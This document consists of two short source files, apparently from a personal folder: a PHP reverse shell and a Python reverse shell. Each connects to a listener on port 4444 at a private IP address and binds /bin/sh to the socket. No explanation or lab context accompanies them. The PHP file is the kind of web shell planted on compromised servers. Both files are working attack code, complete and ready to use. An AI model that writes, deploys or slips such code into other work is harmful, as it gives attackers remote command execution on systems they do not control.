File: python-files/shell.php
<?php
$ip = '192.168.0.106';
$port = 4444;

$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(
    0 => $sock, // STDIN
    1 => $sock, // STDOUT
    2 => $sock  // STDERR
), $pipes);
?>

File: python-files/shell.py
import socket
import subprocess
import os

def reverse_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.8.120", 4444))
    os.dup2(s.fileno(), 0)  # stdin
    os.dup2(s.fileno(), 1)  # stdout
    os.dup2(s.fileno(), 2)  # stderr
    p = subprocess.call(["/bin/sh", "-i"])

if __name__ == "__main__":
    reverse_shell()
